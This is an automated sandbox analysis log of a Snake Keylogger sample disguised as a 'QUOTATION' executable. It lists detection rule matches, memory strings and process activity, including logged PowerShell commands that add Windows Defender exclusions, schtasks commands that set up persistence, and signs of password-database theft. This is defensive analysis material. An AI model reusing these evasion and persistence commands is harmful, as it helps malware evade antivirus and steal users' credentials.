                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D571013_2_0A3D5710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DD30F13_2_0A3DD30F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D5B7813_2_0A3D5B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D5B6A13_2_0A3D5B6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DB38713_2_0A3DB387
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D33E013_2_0A3D33E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D5FD013_2_0A3D5FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D33D013_2_0A3D33D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D5FC013_2_0A3D5FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DC02913_2_0A3DC029
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D642813_2_0A3D6428
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D281813_2_0A3D2818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D641A13_2_0A3D641A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D687013_2_0A3D6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D004013_2_0A3D0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DA0A713_2_0A3DA0A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D049813_2_0A3D0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D048813_2_0A3D0488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D688013_2_0A3D6880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D6CF113_2_0A3D6CF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D08F013_2_0A3D08F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D40E013_2_0A3D40E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D08E013_2_0A3D08E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DCCC813_2_0A3DCCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D0D3913_2_0A3D0D39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D6D0013_2_0A3D6D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D714813_2_0A3D7148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D0D4813_2_0A3D0D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DAD4013_2_0A3DAD40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D75B013_2_0A3D75B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D75A013_2_0A3D75A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D79F813_2_0A3D79F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DB9E013_2_0A3DB9E0
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1124544233.0000000007880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000000.1077459892.0000000000DAE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewoeJ.exe> vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1114647385.000000000130E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1115762220.00000000031A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1125161391.0000000007A20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1115762220.00000000030A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exe, 00000000.00000002.1115762220.00000000030C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exeBinary or memory string: OriginalFilenamewoeJ.exe> vs QUOTATION 03664710859027.exe
                Source: QUOTATION 03664710859027.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: vbc.exe PID: 7980, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: QUOTATION 03664710859027.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: IEGkgGtnYpDN.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, ---.csBase64 encoded string: 'x1MW3t4nyD4Z82bp9pEP5vhR8C/rhbIVtcWCc3fz30Rvf0z9AnVDGtrqa8SDVkbu'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, Feefs8JDXJlbucURht.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, Feefs8JDXJlbucURht.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, HywVl7aGgs78jMHBmX.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, HywVl7aGgs78jMHBmX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, HywVl7aGgs78jMHBmX.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/20@3/4
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeFile created: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE82C.tmpJump to behavior
                Source: QUOTATION 03664710859027.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: QUOTATION 03664710859027.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: vbc.exe, 00000008.00000002.3549250427.0000000007406000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.000000000742D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.0000000007439000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.00000000073E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3549250427.00000000073F7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000008.00000002.3552791576.0000000008232000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006D1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006D29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3552522564.0000000007B20000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006CD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.3549205458.0000000006CE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: QUOTATION 03664710859027.exeReversingLabs: Detection: 30%
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeFile read: C:\Users\user\Desktop\QUOTATION 03664710859027.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION 03664710859027.exe "C:\Users\user\Desktop\QUOTATION 03664710859027.exe"
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpFB27.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION 03664710859027.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpE82C.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IEGkgGtnYpDN" /XML "C:\Users\user\AppData\Local\Temp\tmpFB27.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
